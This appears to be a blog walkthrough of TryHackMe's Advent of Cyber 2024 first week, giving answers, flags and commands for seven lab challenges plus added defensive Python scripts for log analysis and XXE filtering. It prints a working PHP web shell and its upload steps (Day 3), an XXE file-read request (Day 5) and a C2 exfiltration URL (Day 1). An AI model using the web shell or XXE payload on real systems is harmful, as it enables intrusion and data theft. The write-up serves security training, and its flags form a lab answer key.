Advent of Cyber 2024: Week 1's Challenges Unwrapped

Week 1 of TryHackMe’s Advent of Cyber 2024 dives into OPSEC failures, vulnerabilities, and malware mischief. Explore SOC-mas tales of glitches, breaches, and cybersecurity triumphs!

Source: THM's Advent of Cyber 2024
💡
In this year’s Advent of Cyber, can you help McSkidy and the Glitch defend SOC-mas against the evil Mayor Malware’s plans?

SOC-mas is here, and TryHackMe’s Advent of Cyber 2024 has kicked off with a week full of exhilarating challenges! From malicious websites to CloudTrail mishaps, Week 1 puts us on a whirlwind adventure through OPSEC failures, XXE vulnerabilities, and malware mischief. In this write-up, we’ll break down each challenge, uncovering the lessons learned and the joy of mastering the puzzles. Are you ready to dive into the SOC-mas chaos?

Day 1

Maybe SOC-mas music, he thought, doesn't come from a store?

🤖
Glitch and McSkidy stumble across a suspicious website, uncovering poor OPSEC practices that hint at malicious intent. Join them as they investigate, piecing together clues from a poorly secured operation.

Navigate to the IP provided and use the link to convert the video to MP3.

Two files were extracted from the zip archive; somg.mp3 was an MS Windows shortcut, interesting...

Looks like the song.mp3 file is not what we expected! Run "exiftool song.mp3" in your terminal to find out the author of the song. Who is the author?

Tyler Ramsbey
The malicious PowerShell script sends stolen info to a C2 server. What is the URL of this C2 server?
Contents of IS.ps1
http://papash3ll.thm/data
Who is M.M? Maybe his GitHub profile page would provide clues?
The profile of MM-WarevilleTHM
Mayor Malware
What is the number of commits on the GitHub repo where the issue was raised?
💡
Check out the commit history here
1

Day 2

One man's false positive is another man's potpourri.

📉
When unusual login attempts spark concerns, McSkidy and the SOC team dive deep into the logs. What seemed like noise at first might just hold the key to uncovering a hidden threat.
What is the name of the account causing all the failed login attempts?

We first filter for the authentication event category and the failure outcome.

service_admin
How many failed logon attempts were observed?

Using the same filter as the previous question, we then narrow the results to the timeframe given in the context.

Timeframe: Nov 29, 2024 @ 00:00:00.000 - Dec 1, 2024 @ 09:30:00.000
6,791
What is the IP address of Glitch?

Knowing that Glitch was able to access ADM-01, we can filter and search for the successful authentication event.

10.0.255.1
When did Glitch successfully logon to ADM-01? Format: MMM D, YYYY HH:MM:SS.SSS
Dec 1, 2024 08:54:39.000
What is the decoded command executed by Glitch to fix the systems of Wareville?

Filter for event.category: process:

Decode the encoded command from Base64:
echo "SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUAcAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA==" | base64 -d
Install-WindowsUpdate -AcceptAll -AutoReboot

Decode with base64 -d

Install-WindowsUpdate -AcceptAll -AutoReboot
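An added example, not from the original write-up: PowerShell -EncodedCommand blobs are UTF-16LE, so `base64 -d` leaves a NUL byte after every character (the terminal hides them, which is why the output above looks clean but would not match a plain string in a detection rule). This decoder detects UTF-16LE and returns clean text, and falls back to UTF-8 for ordinary Base64 such as the Day 4 flag.

```python
import base64

# Base64 blob from the Day 2 process event (copied from the page).
ENCODED_COMMAND = (
    "SQBuAHMAdABhAGwAbAAtAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUAIAAtAEEAYwBjAGUA"
    "cAB0AEEAbABsACAALQBBAHUAdABvAFIAZQBiAG8AbwB0AA=="
)


def decode_encoded_command(b64: str) -> tuple[str, str]:
    """Decode a Base64 blob the way powershell.exe -EncodedCommand reads it.

    PowerShell encodes the command as UTF-16LE, so ASCII text shows up as
    "I\x00n\x00s\x00..." after a naive base64 decode. Returns (encoding, text).
    """
    raw = base64.b64decode(b64, validate=True)
    # Heuristic: UTF-16LE text of ASCII origin has a NUL at every odd offset.
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return "utf-16-le", raw.decode("utf-16-le")
    return "utf-8", raw.decode("utf-8")


def contains_nul_bytes(b64: str) -> bool:
    """True if plain `base64 -d` output would contain embedded NUL bytes."""
    return b"\x00" in base64.b64decode(b64)


if __name__ == "__main__":
    encoding, text = decode_encoded_command(ENCODED_COMMAND)
    print(f"{encoding}: {text}")
```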

Day 3

Even if I wanted to go, their vulnerabilities wouldn't allow it.

💡
At a security conference, Glitch’s excitement turns to dismay as vulnerabilities in their web application are exposed. The SOC team steps in, racing to secure the flaws before they can be exploited.
http://10.10.110.7:5601/

Web Server's IP Address

BLUE: Where was the web shell uploaded to?
Answer format: /directory/directory/directory/filename.php

We can perform a search for shell.php.

/media/images/rooms/shell.php
BLUE: What IP address accessed the web shell?

We can toggle the source IP to be displayed in the columns and search for the use of shell.php.

RED: What is the contents of the flag.txt?

Access frostypines.thm after adding it to the hosts file:

echo "10.10.110.7 frostypines.thm" >> /etc/hosts

Log in with admin@frostypines.thm:admin, then open the admin page. Find the add_room functionality and attempt to upload a web shell.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

Upload this as shell.php

http://frostypines.thm/media/images/rooms/shell.php?command=ls

Now we can get flag.txt!

THM{Gl1tch_Was_H3r3}

Technically, flag.txt could also be retrieved via a direct object reference:

http://frostypines.thm/media/images/rooms/flag.txt
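A defender-side check for the activity above, added here as an example (not part of the original write-up or the challenge): it scans web server access logs for script files executed from an upload directory that should only ever serve images, and pulls out the command parameter. The log lines are constructed to match the Day 3 scenario; the client IPs and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format) modelled on the Day 3 scenario;
# the IPs and timestamps are made up, the shell path matches the challenge.
SAMPLE_LOG = """\
10.9.1.2 - - [03/Dec/2024:10:12:01 +0000] "GET /media/images/rooms/room1.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.13.27.114 - - [03/Dec/2024:10:13:44 +0000] "GET /media/images/rooms/shell.php?command=ls HTTP/1.1" 200 312 "-" "curl/8.4"
10.13.27.114 - - [03/Dec/2024:10:13:59 +0000] "GET /media/images/rooms/shell.php?command=cat%20flag.txt HTTP/1.1" 200 24 "-" "curl/8.4"
10.9.1.2 - - [03/Dec/2024:10:15:03 +0000] "GET /admin/add_room.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Directories populated by file uploads: any server-side script served from here is a finding.
UPLOAD_DIRS = ("/media/images/",)
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")


def find_webshell_hits(log_text: str) -> list[dict]:
    """Return one dict per request for a script file under an upload directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.startswith(UPLOAD_DIRS) and url.path.lower().endswith(SCRIPT_EXT):
            params = parse_qs(url.query)
            hits.append({
                "ip": m["ip"], "time": m["time"], "path": url.path, "status": int(m["status"]),
                # The Day 3 shell takes its command in ?command=; other shells use other names.
                "command": params.get("command", [None])[0],
            })
    return hits


def source_ips(hits: list[dict]) -> set[str]:
    """Distinct client IPs that touched a script under an upload directory."""
    return {h["ip"] for h in hits}


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit)
```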

Day 4

I’m all atomic inside!

💡
Retracing Glitch’s steps, the SOC team investigates traces left during hasty security fixes. By analyzing breadcrumbs, they uncover critical insights into what went wrong and how to improve security.
What was the flag found in the .txt file that is found in the same directory as the PhishingAttachment.xslm artefact?
Invoke-AtomicTest T1566.001 -TestNumbers 1

Execute Command for T1566.001

Event Viewer View

Navigate to C:\Users\Administrator\AppData\Local\temp and open the txt file:

THM{GlitchTestingForSpearphishing}
What ATT&CK technique ID would be our point of interest?
💡
External research: Look up the MITRE ATT&CK technique ID for Command and Scripting Interpreter.
T1059

Command and Scripting Interpreter

What ATT&CK subtechnique ID focuses on the Windows Command Shell?
T1059.003

Command and Scripting Interpreter: Windows Command Shell

What is the name of the Atomic Test to be simulated?
💡
Replace the subtechnique placeholder in the command Invoke-AtomicTest subtechnique -ShowDetails with the one found in question 3. Look for Atomic Test names relating to malware.
Invoke-AtomicTest T1059.003 -ShowDetails
Simulate BlackByte Ransomware Print Bombing
What is the name of the file used in the test?

Execute Command to get Test Number 4's prerequisites

Invoke-AtomicTest T1059.003 -TestNumbers 4 -GetPrereqs
Wareville_Ransomware.txt
What is the flag found from this Atomic Test?

Invoke the test and open the .pdf file

THM{R2xpdGNoIGlzIG5vdCB0aGUgZW5lbXk=}
echo "R2xpdGNoIGlzIG5vdCB0aGUgZW5lbXk=" | base64 -d
Glitch is not the enemy

Is this a hint?

Day 5

SOC-mas XX-what-ee?

👹
When a critical web application reveals an XXE vulnerability, the SOC team jumps into action. Who introduced the flaw, and how can it be mitigated before it leads to something more catastrophic?
What is the flag discovered after navigating through the wishes?
POST /wishlist.php HTTP/1.1
Host: 10.10.174.219
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/xml
Content-Length: 219
Origin: http://10.10.174.219
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://10.10.174.219/product.php?id=1
Priority: u=0

<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_15.txt"> ]>
<wishlist>
	<user_id>1</user_id>
	<item>
	       <product_id>&payload;</product_id>
	</item>
</wishlist>

POST request to get the flag

THM{Brut3f0rc1n6_mY_w4y}
What is the flag seen on the possible proof of sabotage?
Changelog File (http://10.10.174.219/CHANGELOG)
THM{m4y0r_m4lw4r3_b4ckd00rs}
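As an added example (not from the original post or the challenge application), a server-side guard for the wishlist endpoint: reject any body that declares a DTD before it reaches the XML parser, then validate the fields. The payload is the request shown above; the benign request is constructed for comparison.

```python
import re
import xml.etree.ElementTree as ET

# The wishlist body from the Day 5 request above (indentation normalised).
XXE_PAYLOAD = b"""<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_15.txt"> ]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>"""

# A constructed benign request for comparison (not from the page).
BENIGN_WISHLIST = b"""<?xml version="1.0"?>
<wishlist><user_id>1</user_id><item><product_id>1</product_id></item></wishlist>"""

# No legitimate wishlist needs a DTD, so a DOCTYPE or ENTITY declaration is
# rejected outright, whether or not SYSTEM/PUBLIC or a parameter entity follows.
DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def is_xxe_attempt(body: bytes) -> bool:
    return DTD_RE.search(body) is not None


def parse_wishlist(body: bytes) -> dict:
    """Parse a wishlist body into ids, refusing DTDs and non-numeric values."""
    if is_xxe_attempt(body):
        raise ValueError("DTD/entity declaration rejected")
    root = ET.fromstring(body)
    if root.tag != "wishlist":
        raise ValueError("unexpected root element")
    user_id = root.findtext("user_id") or ""
    product_ids = [item.findtext("product_id") or "" for item in root.findall("item")]
    # Ids are numeric for this endpoint (product.php?id=1); enforcing that also
    # limits what any expanded entity could smuggle into the response.
    if not user_id.isdigit() or not product_ids or not all(p.isdigit() for p in product_ids):
        raise ValueError("non-numeric or missing id")
    return {"user_id": int(user_id), "product_ids": [int(p) for p in product_ids]}


def handle_request(body: bytes) -> tuple[int, object]:
    """Minimal handler: (400, reason) on rejection, (200, parsed ids) otherwise."""
    try:
        return 200, parse_wishlist(body)
    except (ValueError, ET.ParseError) as exc:
        return 400, str(exc)
```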

Day 6

If I can't find a nice malware to use, I'm not going.

🦠
Mayor Malware is on the loose, testing the evasion capabilities of his latest creation. The SOC team counters by analyzing the malware in a sandbox environment, uncovering its secrets.
What is the flag displayed in the popup window after the EDR detects the malware?
Detonate the malware in the VM
THM{GlitchWasHere}
What is the flag found in the malstrings.txt document after running floss.exe, and opening the file in a text editor?
floss.exe C:\Tools\Malware\MerryChristmas.exe | Out-File C:\tools\malstrings.txt

Use floss to extract strings from the .exe file

THM{HiddenClue}

Day 7

Oh, no. I'M SPEAKING IN CLOUDTRAIL!

🏆
The chaos continues as the SOC team grapples with anomalies in AWS CloudTrail logs. What’s causing these irregularities, and can the team trace the source before it escalates further?
jq -r '.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]' cloudtrail_log.json

Command to run (listed in guide)

[
  "2024-11-28T15:22:23Z",
  "ListObjects",
  "glitch",
  "wareville-care4wares",
  "N/A",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:25Z",
  "ListObjects",
  "glitch",
  "wareville-care4wares",
  "N/A",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:39Z",
  "PutObject",
  "glitch",
  "wareville-care4wares",
  "bank-details/wareville-bank-account-qr.png",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:39Z",
  "PreflightRequest",
  "N/A",
  "wareville-care4wares",
  "bank-details/wareville-bank-account-qr.png",
  "53.94.201.69"
]
[
  "2024-11-28T15:22:44Z",
  "ListObjects",
  "glitch",
  "wareville-care4wares",
  "N/A",
  "53.94.201.69"
]

Result

What is the other activity made by the user glitch aside from the ListObject action?
PutObject
What is the source IP related to the S3 bucket activities of the user glitch?
53.94.201.69
Based on the eventSource field, what AWS service generates the ConsoleLogin event?
jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"], (.Records[] | select(.sourceIPAddress=="53.94.201.69") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

Command to execute

2024-11-28T15:21:54Z  signin.amazonaws.com                 ConsoleLogin             glitch         53.94.201.69

Results

signin.amazonaws.com
When did the anomalous user trigger the ConsoleLogin event?
2024-11-28T15:21:54
What was the name of the user that was created by the mcskidy user?
glitch
What type of access was assigned to the anomalous user?
jq -r '.Records[] | select(.eventSource == "iam.amazonaws.com") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .requestParameters.policyArn // "N/A"]' cloudtrail_log.json

Extract the .requestParameters.policyArn object with jq

[
  "2024-11-28T15:21:36Z",
  "AttachUserPolicy",
  "mcskidy",
  "N/A",
  "N/A",
  "arn:aws:iam::aws:policy/AdministratorAccess"
]

Result

AdministratorAccess
Which IP does Mayor Malware typically use to log into AWS?
53.94.201.69
What is McSkidy's actual IP address?
jq -r '["Event_Time","Event_Source","Event_Name", "User_Name","User_Agent","Source_IP"],(.Records[] | select(.userIdentity.userName=="mcskidy") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A",.userAgent // "N/A",.sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

Command to run

mcskidy    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36        31.210.15.79

Result

31.210.15.79
What is the bank account number owned by Mayor Malware?
grep INSERT rds.log

Command to run

2024-11-28T15:24:08.743Z 2024-11-28T15:24:08.743625Z	  263 Query	INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('2394 6912 7723 1294', 'Mayor Malware', 322.10)

Result

2394 6912 7723 1294
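The same correlation the jq commands above perform by hand, added here as an example in Python (not part of the original write-up): baseline each user's usual source IP, then flag privileged IAM actions made from a different IP. The records are constructed to match the Day 7 findings (users, IPs, policy ARN and the AttachUserPolicy, ConsoleLogin and PutObject times); the baseline events and the CreateUser time are assumed.

```python
from collections import Counter, defaultdict

# Constructed CloudTrail records shaped like the page's jq output. Users, IPs,
# policy ARN and the AttachUserPolicy/ConsoleLogin/PutObject times follow the
# Day 7 findings; the mcskidy baseline events and the CreateUser time are assumed.
def rec(time, source, name, user, ip, **params):
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": {"userName": user}, "sourceIPAddress": ip,
            "requestParameters": params}

RECORDS = [
    rec("2024-11-28T09:02:11Z", "signin.amazonaws.com", "ConsoleLogin", "mcskidy", "31.210.15.79"),
    rec("2024-11-28T11:40:37Z", "s3.amazonaws.com", "ListObjects", "mcskidy", "31.210.15.79", bucketName="wareville-care4wares"),
    rec("2024-11-28T13:05:02Z", "s3.amazonaws.com", "ListObjects", "mcskidy", "31.210.15.79", bucketName="wareville-care4wares"),
    rec("2024-11-28T15:21:20Z", "iam.amazonaws.com", "CreateUser", "mcskidy", "53.94.201.69", userName="glitch"),
    rec("2024-11-28T15:21:36Z", "iam.amazonaws.com", "AttachUserPolicy", "mcskidy", "53.94.201.69",
        userName="glitch", policyArn="arn:aws:iam::aws:policy/AdministratorAccess"),
    rec("2024-11-28T15:21:54Z", "signin.amazonaws.com", "ConsoleLogin", "glitch", "53.94.201.69"),
    rec("2024-11-28T15:22:39Z", "s3.amazonaws.com", "PutObject", "glitch", "53.94.201.69",
        bucketName="wareville-care4wares", key="bank-details/wareville-bank-account-qr.png"),
]

# IAM calls that create or widen access; the ones worth a baseline comparison.
PRIVILEGED_IAM = {"CreateUser", "AttachUserPolicy", "PutUserPolicy", "CreateAccessKey", "CreateLoginProfile"}


def usual_ip_per_user(records):
    """Most frequent source IP per user: the baseline each event is compared against."""
    seen = defaultdict(Counter)
    for r in records:
        seen[r["userIdentity"]["userName"]][r["sourceIPAddress"]] += 1
    return {user: ips.most_common(1)[0][0] for user, ips in seen.items()}


def find_anomalous_iam_actions(records):
    """Privileged IAM calls made from an IP other than the caller's usual one."""
    baseline = usual_ip_per_user(records)
    hits = []
    for r in records:
        user, ip = r["userIdentity"]["userName"], r["sourceIPAddress"]
        if r["eventSource"] == "iam.amazonaws.com" and r["eventName"] in PRIVILEGED_IAM and ip != baseline[user]:
            p = r["requestParameters"]
            hits.append((r["eventTime"], r["eventName"], user, ip, p.get("userName"), p.get("policyArn")))
    return hits


if __name__ == "__main__":
    for hit in find_anomalous_iam_actions(RECORDS):
        print(*hit)
```

On the real log the baseline is only as good as the history you feed it, so run it over a window that predates the suspicious activity rather than over the incident alone.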

Week 1 of TryHackMe’s Advent of Cyber 2024 set the stage for an exciting journey through the twists and turns of SOC-mas investigations. From unraveling OPSEC failures and tracking suspicious logins to analyzing vulnerabilities and malware, the challenges highlighted key skills in cybersecurity—vigilance, analysis, and creativity. As the SOC team tackled each scenario, they reminded us of the importance of staying sharp in a constantly evolving threat landscape.

The first week was just a taste of what’s to come. With more challenges on the horizon, the lessons learned here will no doubt build a strong foundation for the weeks ahead. Stay tuned as we continue to uncover the secrets of SOC-mas and dive deeper into the world of cybersecurity sleuthing. Until then, happy hacking!